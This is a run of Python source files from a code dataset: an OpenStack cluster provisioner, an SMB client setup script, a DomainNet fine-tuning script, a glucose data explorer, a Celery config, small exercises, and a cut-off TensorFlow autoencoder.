os_auth_url)\n self.nova_clients[site] = novaclient\n return self.nova_clients[site]\n\n def generate_clusters_keypairs(self, cluster):\n\n request_uuid = cluster.uuid\n tmp_folder = \"tmp/%s\" % (request_uuid)\n\n if not os.path.exists(tmp_folder):\n os.makedirs(tmp_folder)\n\n # Generate ssh key\n if not cluster.private_key and not cluster.public_key:\n logging.info(\"Generating a new pair (public_key, private_key) in %s\" % (tmp_folder))\n key_paths = generate_rsa_key(tmp_folder)\n else:\n key_paths = {\n \"public\": \"%s/public.key\" % (tmp_folder),\n \"private\": \"%s/private.key\" % (tmp_folder)\n }\n if not 
os.path.exists(key_paths[\"public\"]):\n with open(key_paths[\"public\"], \"w\") as f:\n f.write(cluster.public_key)\n if not os.path.exists(key_paths[\"private\"]):\n with open(key_paths[\"private\"], \"w\") as f:\n f.write(cluster.private_key)\n\n # # Generate API token for the project\n # certificate = authenticator.generate_public_certification(tmp_folder)\n # cluster.security_certificate = certificate\n # cluster.save()\n\n def add_node_to_cluster(self, host, master=None):\n\n logging.info(\"Starting addition of a node (%s) to the cluster <%s>\" % (host.id, host.cluster_id))\n\n cluster_db_object = host.cluster\n targetted_site = cluster_db_object.site\n targetted_user = cluster_db_object.user\n nova_client = self.get_novaclient_associated_to_site(targetted_user, targetted_site)\n\n is_master = cluster_db_object.get_master_node() is None\n cluster_type = cluster_db_object.software.name\n\n logging.info(\"Is this new node a master node? %s\" % (is_master))\n\n request_uuid = cluster_db_object.uuid\n tmp_folder = \"tmp/%s\" % (request_uuid)\n # user = host.cluster.user.username\n user = config.configuration[\"user\"]\n\n if not os.path.exists(tmp_folder):\n os.makedirs(tmp_folder)\n\n logging.info(\"node will be configured with script from %s folder\" % (tmp_folder))\n\n request_uuid = cluster_db_object.uuid\n tmp_folder = \"tmp/%s\" % (request_uuid)\n key_paths = {\n \"public\": \"%s/public.key\" % (tmp_folder),\n \"private\": \"%s/private.key\" % (tmp_folder)\n }\n with open(key_paths[\"public\"], \"r\") as f:\n public_key = f.readline()\n with open(key_paths[\"private\"], \"r\") as f:\n private_key = \"\".join(f.readlines())\n\n if not host.cluster.private_key:\n host.cluster.private_key = private_key\n host.cluster.save()\n\n if not host.cluster.public_key:\n host.cluster.public_key = public_key\n host.cluster.save()\n\n logging.info(\"private/public keys available for the instance\")\n\n if is_master:\n cluster_db_object.public_key = public_key\n cluster_db_object.private_key = private_key\n cluster_db_object.save()\n logging.info(\"private/public keys uploaded to the cluster\")\n\n # Generate script that will configure the node\n variables = {\n \"public_key\": public_key,\n \"private_key\": private_key,\n \"is_master\": is_master,\n \"user\": user,\n }\n\n if not is_master:\n logging.info(\"I search the master-node that will be configured with the new node\")\n variables[\"is_master\"] = False\n master_node = cluster_db_object.get_master_node()\n master_node_id = master_node.instance_id\n master = nova_client.servers.find(id=master_node_id)\n master_ip = master.networks[master.networks.keys()[0]][0]\n variables[\"master_ip\"] = master_ip\n variables[\"master_name\"] = master.name\n logging.info(\"I found the master-node that will be configured with the new node\")\n\n logging.info(\"Creating user data for the instance\")\n user_data_path = \"%s/user_data\" % (tmp_folder)\n user_data = generate_template(\"%s/user_data.jinja2\" % cluster_type, variables)\n generate_template_file(\"%s/user_data.jinja2\" % cluster_type, user_data_path, variables)\n logging.info(\"User data successfully generated!\")\n\n logging.info(\"Calling 'provision_new_instance' to create an instance\")\n\n # Provision an instance\n (instance, host) = self.provision_new_instance(nova_client, host, user_data=user_data)\n\n logging.info(\"The instance has been created\")\n\n if is_master:\n host.is_master = True\n host.save()\n logging.info(\"A master node of cluster <%s> has been elected\" % 
(host.cluster_id))\n\n time.sleep(3)\n instances_ids = map(lambda x: x.instance_id, cluster_db_object.host_set.all())\n instances = map(lambda id: nova_client.servers.find(id=id), instances_ids)\n\n logging.info(\"Updating hosts file of nodes %s\" % (instances_ids))\n update_hosts_file(instances, user, key_paths[\"private\"], tmp_folder=tmp_folder)\n logging.info(\"Hosts file of nodes %s have been updated\" % (instances_ids))\n\n floating_ip = detect_floating_ip_from_instance(instance)\n host.instance_ip = floating_ip\n host.save()\n logging.info(\"The new instance has now a floating IP (%s)\" % (floating_ip))\n\n variables[\"node_ip\"] = floating_ip\n variables[\"node_name\"] = instance.name\n\n if is_master:\n variables[\"is_master\"] = True\n variables[\"master_ip\"] = floating_ip\n variables[\"master_name\"] = instance.name\n\n # Giving time to the instance to fully startup\n time.sleep(2)\n\n # Try to connect to the instance\n logging.info(\"Trying to establish a ssh connection to the new instance\")\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(floating_ip, username=user, key_filename=key_paths[\"private\"])\n logging.info(\"Ssh connection established!\")\n\n execute_ssh_cmd(ssh, \"touch success\")\n\n # Configure Node\n logging.info(\"Preparing the new node\")\n prepare_node_path = \"%s/prepare_node\" % (tmp_folder)\n generate_template_file(\"%s/prepare_node.jinja2\" % cluster_type, prepare_node_path, variables)\n\n sftp = ssh.open_sftp()\n sftp.put(prepare_node_path, 'prepare_node.sh')\n time.sleep(5)\n\n execute_ssh_cmd(ssh, \"bash prepare_node.sh\")\n\n logging.info(\"Node prepared!\")\n\n # Configure cluster node\n logging.info(\"Configuring node to join the cluster\")\n configure_node_path = \"%s/configure_node\" % tmp_folder\n generate_template_file(\"%s/configure_node.jinja2\" % cluster_type, configure_node_path, variables)\n\n sftp = ssh.open_sftp()\n sftp.put(configure_node_path, 'configure_node.sh')\n time.sleep(5)\n execute_ssh_cmd(ssh, \"bash configure_node.sh\")\n\n logging.info(\"The node joined the cluster!\")\n\n if not is_master:\n time.sleep(30)\n # Updating master_node\n logging.info(\"Connecting to the master node\")\n master_node_floating_ip = detect_floating_ip_from_instance(master)\n ssh_master = paramiko.SSHClient()\n ssh_master.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh_master.connect(master_node_floating_ip, username=user, key_filename=key_paths[\"private\"])\n logging.info(\"Successfully connected to the master node!\")\n\n # Send files to the master node\n logging.info(\"Updating master node to take into account the new node\")\n update_master_node_path = \"%s/update_master_node\" % (tmp_folder)\n generate_template_file(\"%s/update_master_node.jinja2\" % cluster_type, update_master_node_path, variables)\n\n sftp_master = ssh_master.open_sftp()\n sftp_master.put(update_master_node_path, 'update_master_node.sh')\n time.sleep(5)\n ssh_master.exec_command(\"bash update_master_node.sh\")\n logging.info(\"Successfully updated the master node!\")\n\n return True\n","sub_path":"core/mister_cluster.py","file_name":"mister_cluster.py","file_ext":"py","file_size_in_byte":13856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"556597011","text":"#!/usr/bin/env python\n#\n# Copyright (c) 2016-2020, Dell Inc. 
or its subsidiaries.\n# All rights reserved.\n# See file LICENSE for licensing information.\n#\n\nimport ctypes\nimport os\nimport unittest\n\ntry:\n from setuptools import setup, Extension, Command\nexcept ImportError:\n from distutils.core import setup, Extension, Command\nfrom distutils.command.build_ext import build_ext\nfrom distutils.command.build_py import build_py\nfrom distutils.errors import CCompilerError, DistutilsExecError, DistutilsPlatformError\n\n_HERED = os.path.abspath(os.path.dirname(__file__))\n_README = os.path.join(_HERED, 'README.md')\n\n# attempt building the kerberos extension\ntry_krb = True\next_errors = (CCompilerError, DistutilsExecError, DistutilsPlatformError)\n\n\nclass BuildFailed(Exception):\n pass\n\n\nclass ve_build_ext(build_ext):\n # This class allows C extension building to fail.\n\n def run(self):\n try:\n build_ext.run(self)\n except DistutilsPlatformError:\n raise BuildFailed()\n\n def build_extension(self, ext):\n try:\n build_ext.build_extension(self, ext)\n except ext_errors:\n raise BuildFailed()\n\n\nclass ve_build_py(build_py):\n def run(self, *args, **kwds):\n if not try_krb:\n print(\"libgssapi_krb5 not available, skipping kerberos module\")\n build_py.run(self, *args, **kwds)\n\n\ntry:\n libgssapi_krb5 = ctypes.CDLL(\"libgssapi_krb5.so\")\n defines = [\n (\"HAVE_GSS_SET_CRED_OPTION\", hasattr(libgssapi_krb5, \"gss_set_cred_option\")),\n (\n \"HAVE_GSSSPI_SET_CRED_OPTION\",\n hasattr(libgssapi_krb5, \"gssspi_set_cred_option\"),\n ),\n ]\n lw_krb_module = Extension(\n \"pike.kerberos\",\n [\n \"pykerb/base64.c\",\n \"pykerb/kerberosbasic.c\",\n \"pykerb/kerberos.c\",\n \"pykerb/kerberosgss.c\",\n \"pykerb/kerberospw.c\",\n ],\n libraries=[\"gssapi_krb5\"],\n define_macros=defines,\n )\nexcept OSError:\n try_krb = False\n\n\ndef pike_suite():\n return unittest.defaultTestLoader.discover(\"pike/test\", pattern=\"*.py\")\n\n\n# Get the long description from the README.md file\nwith open(_README, 'rb') as f_:\n long_description = f_.read().decode(\"utf-8\")\n\n\ndef run_setup(with_extensions):\n ext_modules = []\n cmdclass = {\"build_py\": ve_build_py}\n if with_extensions:\n ext_modules.append(lw_krb_module)\n cmdclass = dict(cmdclass, build_ext=ve_build_ext)\n setup(\n name=\"pike-smb2\",\n use_scm_version=True,\n setup_requires=[\n 'setuptools_scm==5.0.2; python_version ~= \"2.7\"',\n 'setuptools_scm; python_version >= \"3.6\"',\n ],\n description=\"Pure python SMB client\",\n long_description_content_type='text/markdown',\n long_description=long_description,\n author=\"Brian Koropoff\",\n author_email=\"Brian.Koropoff@emc.com\",\n maintainer=\"Masen Furer\",\n maintainer_email=\"Masen.Furer@dell.com\",\n url=\"https://github.com/emc-isilon/pike\",\n project_urls={\n \"Source\": \"https://github.com/emc-isilon/pike\",\n \"Bug Reports\": \"https://github.com/emc-isilon/pike/issues\",\n },\n license=\"Simplified BSD License\",\n packages=[\"pike\", \"pike.test\"],\n entry_points={\"pytest11\": [\"pike = pike.pytest_support\",]},\n python_requires=\">=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*\",\n install_requires=[\n 'enum34~=1.1.6; python_version ~= \"2.7\"',\n 'attrs~=19.3.0',\n \"pycryptodomex\",\n \"future\",\n \"six\",\n ],\n ext_modules=ext_modules,\n test_suite=\"setup.pike_suite\",\n cmdclass=cmdclass,\n # see https://pypi.org/classifiers/\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"Topic :: Software Development :: Testing\",\n \"Programming Language :: Python\",\n 
\"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n \"Operating System :: OS Independent\",\n \"Environment :: Console\",\n \"License :: OSI Approved :: BSD License\",\n ],\n keywords='smb smb-testing smb-client',\n )\n\n\ntry:\n run_setup(with_extensions=try_krb)\nexcept BuildFailed:\n run_setup(with_extensions=False)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"155395216","text":"import os\nimport itertools\nimport random\nimport argparse\nimport torch\nimport numpy as np\nimport torchvision\nimport sys\nsys.path.append(\"../\")\nfrom dataloaders import standard_dataloaders\nfrom torch.utils.data import Dataset, DataLoader\nimport models\nimport data_utils\nimport tqdm\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nRAND_SEED = 1\ntorch.manual_seed(RAND_SEED)\ntorch.cuda.manual_seed(RAND_SEED)\nnp.random.seed(RAND_SEED)\nrandom.seed(RAND_SEED)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\nclass Identity(torch.nn.Module):\n def __init__(self):\n super().__init__()\n\n def forward(self, x):\n return x\n\ndef validate(val_dataloader, encoder, classifier):\n\n correct = 0\n total = 0\n\n with torch.no_grad():\n\n for iter, (data, labels) in enumerate(tqdm.tqdm(val_dataloader)):\n data = data.to(device)\n labels = labels.to(device)\n\n encoded = encoder(data)\n preds = classifier(encoded)\n\n _, predicted = torch.max(preds.data, 1)\n\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\n accuracy = correct / total\n\n return accuracy\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--exp_type\")\n parser.add_argument(\"--source\")\n parser.add_argument(\"--target\")\n parser.add_argument(\"--save_dir\", type = str, default = '../weights/' )\n parser.add_argument(\"--data_path\", type = str, default = '../data/DomainNet')\n #model hyperparameters\n #optimizer hyperparameters\n parser.add_argument(\"--lr\", type = float, default = 0.001)\n parser.add_argument(\"--K\", type = int, default = 7)\n parser.add_argument('--batch_size', type=int, default=64)\n parser.add_argument(\"--num_epochs\", type = int, default = 50)\n parser.add_argument(\"--num_workers\", type = int, default = 16)\n #training helpers\n args = parser.parse_args()\n\n pretrain_dir = os.path.join(args.save_dir, '{}_pretrain'.format(args.source))\n pretrain_cls_fp = os.path.join(pretrain_dir, 'best_{}_cls_pretrain.pth'.format(args.source))\n pretrain_encoder_fp = os.path.join(pretrain_dir, 'best_{}_encoder_pretrain.pth'.format(args.source))\n save_dir = '../weights/{}'.format(args.exp_type)\n\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n\n encoder = torchvision.models.resnet101(pretrained=True)\n encoder.fc = Identity()\n classifier = torch.nn.Linear(2048, 350)\n\n\n encoder = torch.nn.DataParallel(encoder)\n classifier = torch.nn.DataParallel(classifier)\n\n encoder.load_state_dict(torch.load(pretrain_encoder_fp))\n\n encoder = encoder.to(device)\n classifier = 
classifier.to(device)\n\n    cls_criterion = torch.nn.CrossEntropyLoss()\n    optimizer_cls = torch.optim.SGD(itertools.chain(\n                                classifier.parameters(),\n                                encoder.parameters()) ,\n                                lr = args.lr, momentum = 0.9, nesterov = True)\n\n    '''\n    Get Target\n    '''\n    data_path = os.path.join(args.data_path, args.target)\n    test_ims = os.path.join(args.data_path, '{}_test.txt'.format(args.target))\n    train_ims = os.path.join(args.data_path, '{}_train.txt'.format(args.target))\n    print (pretrain_dir, pretrain_cls_fp, test_ims, train_ims)\n    target_data_train, target_data_val = data_utils.get_dataloaders(data_path, train_ims, test_ims, K = args.K)\n\n\n    print (len(target_data_train), len(target_data_val))\n\n    data_train = DataLoader(target_data_train, batch_size = args.batch_size, shuffle = True, drop_last = True)\n    data_val = DataLoader(target_data_val, batch_size = args.batch_size, shuffle = False, drop_last = False, num_workers = args.num_workers)\n\n    best_accuracy = -1\n    for epoch_iter in range(args.num_epochs):\n\n        running_epoch_loss = 0\n\n        for iter, (data, labels) in enumerate(tqdm.tqdm(data_train)):\n\n\n            optimizer_cls.zero_grad()\n\n            data = data.to(device)\n            labels = labels.to(device)\n\n            encoded = encoder(data)\n            preds = classifier(encoded)\n\n            cls_loss = cls_criterion(preds, labels)\n\n            cls_loss.backward()\n            optimizer_cls.step()\n\n            running_epoch_loss += cls_loss.item()\n\n\n\n        epoch_loss = running_epoch_loss / len(data_train)\n\n        accuracy = validate(data_val, encoder, classifier)\n\n        print (\"|Epoch: {} | Epoch Loss: {} | Val Accuracy: {}|\".format(epoch_iter+1, epoch_loss, accuracy))\n\n        if accuracy > best_accuracy:\n            best_accuracy = accuracy\n            encoder_f = 'best_{}_encoder_pretrain.pth'.format(args.exp_type)\n            cls_f = 'best_{}_cls_pretrain.pth'.format(args.exp_type)\n\n            encoder_path = os.path.join(save_dir, encoder_f)\n            cls_path = os.path.join(save_dir, cls_f)\n\n            torch.save(encoder.state_dict(), encoder_path)\n            torch.save(classifier.state_dict(), cls_path)\n","sub_path":"domainnet/finetune.py","file_name":"finetune.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"336475958","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# - pulls from the checklist.json config the list of pages with checksums of their json descriptions and page_ids for posting the pages\n# - computes checksums of the current *.comments descriptions and, if they differ, sets a status (page_status) in worklist.json\n#   - the page exists and the checksum is unchanged -- skip it: \"unchanged\"\n#   - the page exists and the checksum changed -- do an \"update\"\n#   - the page does not exist -- do an \"add\"\n# - the data_dictionary module distinguishes UPDATE, ADD and UNCHANGED; for UPDATE it uses the provided page_ids\nimport json\nimport os\nimport re\nfrom ertelecom.checklist import md5, load_checklist\n\n\nCONNECTIONS_FILE = \"connections.json\"\nWORKLIST_FILE = \"worklist.json\"\nCHECKLIST_FILE = \"checklist.json\"\n\n\ndef load_comments_folder(folder):\n    checklist = load_checklist(CHECKLIST_FILE)\n    files = [f for f in os.listdir(folder) if re.match(r\".*\\.json\", f)]\n    meta_part = []\n    for file_name in files:\n        with open(folder + file_name, \"r\") as comment_file:\n            print(f\"Loading {folder}{file_name}...\")\n            items = json.load(comment_file)\n            database = list(items.keys())[0]\n            tables_dict = items[database][\"tables\"]\n\n            md5_file = md5(folder + file_name)\n            md5_old = (checklist.get(folder + file_name) or {}).get(\"md5\") or \"-1\"\n            database_page = (checklist.get(folder + 
file_name) or {}).get(\"database_page\") or -1\n            table_pages = (checklist.get(folder + file_name) or {}).get(\"table_pages\") or {}\n            if md5_old == \"-1\":\n                operation = \"add\"\n                print(f\"  - new database, ADD needed ({md5_old} vs {md5_file})\")\n                meta_part.append(\n                    {\"name\": database, \"tables\": list(tables_dict.keys()), \"skip_partitions\": True, \"page_status\": operation}\n                )\n            elif md5_file != md5_old:\n                operation = \"update\"\n                print(f\"  - different checksums, UPDATE needed ({md5_old} vs {md5_file})\")\n                meta_part.append(\n                    {\n                        \"name\": database,\n                        \"tables\": list(tables_dict.keys()),\n                        \"skip_partitions\": True,\n                        \"page_status\": operation,\n                        \"database_page\": database_page,\n                        \"table_pages\": table_pages,\n                    }\n                )\n            else:\n                operation = \"unchanged\"\n                print(f\"  - no difference found, SKIPPING ({md5_old} vs {md5_file})\")\n                meta_part.append(\n                    {\"name\": database, \"tables\": list(tables_dict.keys()), \"skip_partitions\": True, \"page_status\": operation}\n                )\n\n    return meta_part\n\n\nif __name__ == \"__main__\":\n    meta = {}\n    with open(WORKLIST_FILE, \"w\") as wl_file, open(CONNECTIONS_FILE, \"r\") as connections_file:\n        connections = json.load(connections_file)\n        meta[\"hive\"] = load_comments_folder(connections[\"hive\"][\"comments_path\"])\n        meta[\"clickhouse\"] = load_comments_folder(connections[\"clickhouse\"][\"comments_path\"])\n        print(f\"Writing {wl_file}\")\n        json.dump(meta, wl_file, indent=4)\n    print(\"Done\")\n\n","sub_path":"generate_conf.py","file_name":"generate_conf.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"100109002","text":"import operator\nimport datetime as dt\nimport pandas as pd\nimport numpy as np\n\nclass Explorer():\n    def __init__(self, df, lo=70, up=180, \n                 begin_date=dt.datetime(1700, 1, 1, 0, 0), \n                 end_date=dt.datetime(2200, 1, 1, 0, 0)):\n        \"\"\" df: dataframe with all the data this explorer needs\n            lo: lower bound for bg care analysis\n            up: upper bound for bg care analysis\n            begin_date: begin date for studied interval\n            end_date: end date for studied interval\n        \"\"\"\n        self.df = df\n        self.lo = lo\n        self.up = up\n        self.begin_date = begin_date\n        self.end_date = end_date\n\n    def update(self, df=None, lo=None, up=None, begin_date=None, end_date=None):\n        \"\"\"Update attributes in our explorer object\"\"\"\n        if df:\n            self.df = df\n        if lo:\n            self.lo = lo\n        if up:\n            self.up = up\n        if begin_date:\n            self.begin_date = dt.datetime(begin_date.year, begin_date.month,\n                    begin_date.day) - pd.DateOffset(days=0)\n        if end_date:\n            self.end_date = dt.datetime(end_date.year, end_date.month,\n                    end_date.day, 23, 59, 59) - pd.DateOffset(days=0)\n\n    def bg_count(self):\n        \"\"\"Number of non-null blood glucose registries\"\"\"\n        return self.df.bg.count()\n\n    def interval_filter(self):\n        \"\"\"Returns dataframe of registries inside self.interval\"\"\"\n        return ((self.df.date >= self.begin_date) &\n                (self.df.date <= self.end_date))\n\n    def meal_filter(self, meal='all', moment='before'):\n        \"\"\"Returns boolean dataframe of registries of\n        meals based on filters given as parameters.\n\n        moments: before, after, all\n\n        meals: snack, breakfast, lunch, dinner, all, no_meal\n\n        if filtering for meals='no_meal', this algorithm works the same way as if\n        meals='all', except it returns the opposite boolean value for each cell\n        \"\"\"\n        meals = (['snack', 'dinner', 'lunch', 'breakfast']\n                 if meal in 'all no_meal'\n                 else [meal])\n\n        if moment == 'after':\n            meals = 
['after_'+meal for meal in meals]\n elif moment == 'all' or meal == 'no_meal':\n meals += ['after_'+meal for meal in meals] \n\n # test for intersection with meals\n sel = operator.eq if meal == 'no_meal' else operator.gt\n return self.df.tags.apply(lambda tag :\n sel(len([m for m in meals if m in tag]), 0)\n if isinstance(tag, str)\n else sel == operator.eq)\n\n def basic_stats(self, column, op, meal=None, moment=None,\n operate_on_cumsum=None):\n \"\"\"Basic stats should handle any operation that depends only\n on a row's value (not on next row, or on a group of rows) and\n uses this class' standard interval and meal filters.\n \"\"\"\n if not meal:\n filtered_df = self.df\n else:\n filtered_df = self.df[self.meal_filter(meal, moment)]\n\n # todo: function to group by anything\n if operate_on_cumsum == 'per_day':\n # group by day\n filtered_df = filtered_df.groupby(filtered_df.date.dt.normalize()).sum()\n elif operate_on_cumsum == 'per_week':\n return 1\n # group by week\n pass\n elif operate_on_cumsum == 'per_month':\n return 2\n # group by month\n pass\n\n filtered_df = filtered_df[column]\n if op == 'cumsum': #cumulative sum\n return filtered_df.sum()\n elif op == 'avg':\n return filtered_df.mean()\n elif op == 'std': #std deviation\n return filtered_df.std()\n\n def range_time(self, region='in', count=False):\n \"\"\"Percentage (our count) of registries with bg in, above or below\n range.\n\n region: below, above, in\n \"\"\"\n if region == 'below':\n region_df = self.df.bg[self.df.bg < self.lo]\n elif region == 'above':\n region_df = self.df.bg[self.df.bg > self.up]\n else:\n region_df = (self.df.bg[(self.df.bg >= self.lo)\n & (self.df.bg <= self.up)])\n\n region_df = region_df[self.interval_filter()]\n\n if count:\n return region_df.count()\n else:\n return region_df.count()*100/self.df.bg.count()\n\n def HbA1c(self, up_until=None, use_interval=None):\n \"\"\"Glycated hemoglobin starting 3 months before up_until and ending at\n up_until.\n\n If up_until == None, calculates HbA1c starting 3 months from today.\n If use_interval, uses explorer's interval.\n \"\"\"\n if up_until:\n start_date = up_until\n else:\n start_date = dt.datetime.now()\n\n if use_interval:\n start_date = self.begin_date\n else:\n start_date -= pd.DateOffset(months=3)\n\n avg_bg = self.df.bg[self.df.date >= start_date].mean()\n return (avg_bg+46.7)/28.7\n","sub_path":"explorer.py","file_name":"explorer.py","file_ext":"py","file_size_in_byte":5030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"202524025","text":"# If you get a PayPal error, you'll get a PayPal error code back.\n# This converts these into localisable strings we can give to the user.\nfrom tower import ugettext as _\n\n# Codes:\n# - starting with 100000+ are solitude specific codes.\n# - starting with 500000+ are paypal specific codes.\ncodes = {\n '0': _('There was an error with that request.'),\n # The personal data returned did not match the paypal id specified.\n # This message is defined in solitude, so just pass it through.\n '100001': _('The email returned by Paypal, did not match the PayPal '\n 'email you entered. 
Please login using %(email)s.'),\n}\n\n\ndef lookup(code, data):\n return codes.get(str(code), codes.get('0')) % data\n\n# See the PayPal docs for information on these codes: http://bit.ly/vWV525\npre_approval_codes = ['539012', '569013', '569016', '569017', '569018',\n '569019', '579010', '579014', '579024', '579025',\n '579026', '579027', '579028', '579030', '579031',\n '589019']\n","sub_path":"lib/pay_server/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"455140815","text":"#! /usr/bin/python3\r\n\r\nimport sys\r\n#Fill out the following 8 values. CHOOSE ONLY ONE! Annual or Monthly! \r\nrent = 0 \r\nfood = 0\r\nutilites = 0 \r\ngas = 0 \r\nrecreation = 0 \r\ninsurance = 0 \r\nrepairs = 0 #(Car maintenence)\r\nhouseHold = 0 #(ie. toilet paper, soap)\r\n\r\nsumTotal = (rent + food + utilites + gas + recreation + insurance + repairs + houseHold)\r\nif sumTotal == 0:\r\n\tprint('\\n\\tAre you sure you filled out the values in the source code?\\n\\tPlease edit with a text editor.\\n')\r\n\tsys.exit()\r\n\r\nprint(f'\\n\\tDid you choose monthly(m) or yearly?(y): ',end='')\r\nmetric = 'x'\r\nwhile metric != 'm' and metric != 'y':\r\n\tanswer = input()\r\n\tmetric = answer.lower()\r\n\tif metric == 'm':\r\n\t\tsumTotal *= 12\r\n\telif metric == 'y': \r\n\t\tcontinue\r\n\telse: \r\n\t\tprint('\\n\\tType either m or y: ',end='')\r\n\r\nhourlyPay = sumTotal / 52.143 / 40 \r\nprint(f'\\n\\t1. Each year on average you spend, ${sumTotal}.')\r\nprint(f'\\n\\t2. Each day you spend ${(sumTotal/365)}.') #look-up how to format f string to print out 2 decimal places.\r\nprint(f'\\n\\t3. To sustain this, if you work 40 hours a week, \\n\\t you need a job that pays at least: ${hourlyPay/0.8} / hour.')\r\nprint(f'\\n\\t4. 
Each weekly paycheck should be at least ${int(hourlyPay * 40)} (after tax).\\n')\r\n\r\n","sub_path":"finances/templateSum.py","file_name":"templateSum.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"513596292","text":"# Enter several integers and print the maximum value\n# m = int(input('Input first number >>>'))\n# while True:\n#     c = input('Input a number >>>')\n#     if c:\n#         n = int(c) # the error is raised by the int() function\n#         if n > m:\n#             m = n\n#     print('Max is', m)\n#     else:\n#         break\n\nw = []\nwhile True:\n    n = input(\"pls input n: \")\n    if n == 'q':\n        break\n    else:\n        n1 = int(n)\n        w.append(n1)\nprint(w)\nprint(max(w))","sub_path":"练习/获取最大值.py","file_name":"获取最大值.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"163265472","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/4/22 5:22 PM\n# @Author : evaseemefly\n# @Desc :\n# @Site : \n# @File : celery_con.py\n# @Software: PyCharm\nimport os\nfrom celery import Celery, platforms\nfrom django.conf import settings\nfrom tasks.settings import BROKER_URL, CELERY_RESULT_BACKEND, CELERY_TASK_SERIALIZER, CELERY_RESULT_SERIALIZER, \\\n    CELERY_TASK_RESULT_EXPIRES, CELERY_ACCEPT_CONTENT\n\n# set the environment variable for celery: django -> settings\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Search_Rescue.settings')\napp = Celery(\n    backend='amqp',\n    broker=BROKER_URL,\n    CELERY_ROUTES={\n        'worker.test1': {'queue': 'test1'}\n    },\n)\n# allow celery to start with root privileges\nplatforms.C_FORCE_ROOT = True\napp.conf.update(\n    CELERY_TASK_SERIALIZER=CELERY_TASK_SERIALIZER,\n    CELERY_RESULT_SERIALIZER=CELERY_RESULT_SERIALIZER,\n    CELERY_IGNORE_RESULT=True,\n    CELERYD_PREFETCH_MULTIPLIER=10,\n    CELERYD_MAX_TASKS_PER_CHILD=200,\n)\n\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\n","sub_path":"review_webserver/Search_Rescue/tasks/celery_con.py","file_name":"celery_con.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"70339408","text":"import pandas as pd\nimport tensorflow as tf\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\n\nEPOCHS = 5000\n\ncostLog = []\n\ndef next_batch(data, size):\n    seed = np.random.randint(0,(data.shape[0]) - size)\n    nextSeed = seed + size\n    return data[seed:nextSeed]\n\ndef cosDistance(vec1, vec2):\n    if np.linalg.norm(vec1) * np.linalg.norm(vec2) == 0:\n        return 0\n    return np.inner(vec1,vec2)/(np.linalg.norm(vec1) * np.linalg.norm(vec2))\n\n#training data\ninternals = pickle.load(open(\"realWord.p\", \"rb\"))\ninternal = np.array([np.array(a['vec']) for a in internals[0:4000]])\n\n#test data\nexternal = pickle.load(open(\"distortWord.p\", \"rb\"))\nprint(\"Done\")\n\nx = tf.placeholder(tf.float32, shape=[None, 26])\ny = tf.placeholder(tf.float32, shape = [None, 26])\n\nweightsE = {'W1':tf.Variable(tf.truncated_normal([26,20], stddev = 0.1)),'W2':tf.Variable(tf.truncated_normal([20, 15], stddev = 0.1)), 'W3':tf.Variable(tf.truncated_normal([15, 10], stddev = 0.1))}\nbiasesE = {'B1':tf.Variable(tf.truncated_normal([20], stddev = 0.1)),'B2':tf.Variable(tf.truncated_normal([15], stddev = 0.1)), 'B3':tf.Variable(tf.truncated_normal([10], stddev = 0.1))}\n\nweightsD = {'W1':tf.Variable(tf.truncated_normal([10,15], stddev = 0.1)),\"W2\":tf.Variable(tf.random_normal([15, 26], stddev = 0.1))}\nbiasesD = {'B1':tf.Variable(tf.truncated_normal([15], stddev = 
